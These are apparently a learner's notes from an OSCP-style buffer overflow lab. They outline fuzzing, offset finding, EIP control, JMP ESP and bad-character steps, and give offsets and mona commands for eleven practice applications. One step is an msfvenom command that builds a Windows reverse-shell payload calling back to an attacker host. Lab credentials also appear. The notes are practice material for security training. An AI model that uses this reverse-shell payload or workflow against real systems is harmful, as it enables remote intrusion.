Practice stack-based buffer overflows!
This is simple write there swill be no screenshot, flag etc
Steps to involve in BufferOverFlow
- Find IP, Port and sending message
- Fuzzing and find crash point
- create pattern {./usr/share/metasploit-framework/tools/exploit/pattern_create -l size_of_crash
- Send created pattern and determine EIP
- find oddset from EIP /usr/share/metasploit-framework/tools/exploit/Pattern_offset -q EIP
- Control EIP => “A” * OffsetValue+ “B” *4 +”C” * (buff-len(buff)
- Find JMP ESP Executive_Module=>kernal32.dll || user32.dll || Shell32.dll
- find commadn JMP ESP
- find bad character
- fina paylaod
OSCP BUfferoverflow Task
TOTal Overflow 10 application
login via freexrdp xfreerdp /v:10.10.17.30 /u:admin /p:password
ip 10.10.17.30
OSCP_BF_1 =>
{
1. Find crash Point => 2000
2, Find Offset => 1978
3. Find BadChar => “\x00\x07\x2e\xa0”
4. find JMP ESP =>625011AF =>\xaf\x11\x50\x62"
5. payload => msfvenom -p windows/shell_reverse_tcp LHOST=192.168.135.128 LPORT=1234 EXITFUNC=thread -b “\x00\x07\x2e\xa0” -f c
}
OSCP_BF_2
{
Send same input with “OVERFLOW2 “ command
1. find crash at 1000
2. find offset 634
3. bad character
}
OSCP_BF_3
{
1. OFFset 634
2. BC => \x00\x23\x3c\x83\xba
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a esp
}
OSCP_BF_4
{
1. find offset 1274
2. Find bad char=> \x00\x11\x40\x5f\xb8\xee
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 010EFA18
}
OSCP_BF_5
{
1. offset 2026
2. BAd char=> \x00\xa9\xcd\xd4
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 009AFA18
}
OSCP_BF_6
{
offset 314
badchar=> \x00\x16\x2f\xf4\xfd
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 00AFFA18
}
OSCP_BF_7
{
offset 1034
badchar=> \x00\x08\x2c\xad ae
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 0096FA18
}
OSCP_BF_8
{
offset 1306
badchar=> \x00\x8c\xae\xbe\xfb
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 0094FA18
}
OSCP_BF_9
{
1. offset 1786
badchar=> \x00\x1d\x2e\xc7\xee ef
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 0109FA18
}
OSCP_BF_10
{
1. offset 1514
badchar=>\x00\x04\x3e\xe1\xe2
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 010EFA18
}
OSCP_BF_11
{
1. offset 537
badchar=> \x00\xa0\xad\xbe\xde\xef
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 010AFA18
}
nc 10.10.17.30 1337